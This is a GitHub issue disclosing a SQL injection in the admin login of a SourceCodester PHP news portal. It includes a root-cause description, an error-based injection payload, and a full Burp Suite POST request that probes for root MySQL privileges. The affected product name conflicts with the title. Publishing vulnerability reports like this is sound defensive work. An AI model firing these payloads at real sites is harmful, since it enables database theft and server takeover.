Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

SourceCodester Best online news portal project in php free download /admin/index.php SQL injection #45

Open
1097hzy opened this issue Jun 13, 2024 · 0 comments
Open

SourceCodester Best online news portal project in php free download /admin/index.php SQL injection #45

1097hzy opened this issue Jun 13, 2024 · 0 comments

Comments

@1097hzy
Copy link

1097hzy commented Jun 13, 2024

SourceCodester Best online news portal project in php free download /admin/index.php SQL injection

NAME OF AFFECTED PRODUCT(S)

  • CASAP Automated Enrollment System using PHP/MySQLi with Source Code

Vendor Homepage

AFFECTED AND/OR FIXED VERSION(S)

submitter

  • xuanluansec

Vulnerable File

  • /admin/index.php

VERSION(S)

  • V1.0

Software Link

PROBLEM TYPE

Vulnerability Type

  • SQL injection

Root Cause

  • The PHP method in line 10 of the /admin/index.php file retrieves user input from the POST element. Then, the value of this element will be passed to the code without proper purification or validation, and ultimately the database query in the PHP method on line 14. This may lead to SQL injection attacks.
  • 2

Impact

  • Attackers can exploit this vulnerability to gain database privileges, which can result in a large amount of data in the database. If the other party's database has DBA privileges, it may lead to server host privileges being obtained.

DESCRIPTION

  • xuanluansec has discovered a serious issue in "Best online news portal project in php free download" that can allow attackers to obtain large amounts of database content through SQL injection attacks.

Vulnerability details and POC

Payload

  • admin1'||(SELECT 0x57466361 WHERE 3243=3243 AND (SELECT 3588 FROM(SELECT COUNT(*),CONCAT(0x716a707171,(SELECT (CASE WHEN (ISNULL(TIMESTAMPADD(MINUTE,9341,NULL))) THEN 1 ELSE 0 END)),0x717a627671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'
  • 5

Burp Suite (POC)

POST /admin/ HTTP/1.1
Host: www.101news.com:8120
Content-Length: 328
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://www.101news.com:8120
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://www.101news.com:8120/admin/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=mgnba8pjlh638vt3ipj6ue06ph
Connection: close

username=admin1'||(SELECT 0x48577666 WHERE 4844=4844 AND (SELECT 7969 FROM(SELECT COUNT(*),CONCAT(0x716a707171,(SELECT (CASE WHEN ((SELECT super_priv FROM mysql.user WHERE user=0x726f6f74 LIMIT 0,1)=0x59) THEN 1 ELSE 0 END)),0x717a627671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'&password=admin&login=
  • 1
  • Here is the MySQL database name obtained from the sqlmap attack
  • 4
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@1097hzy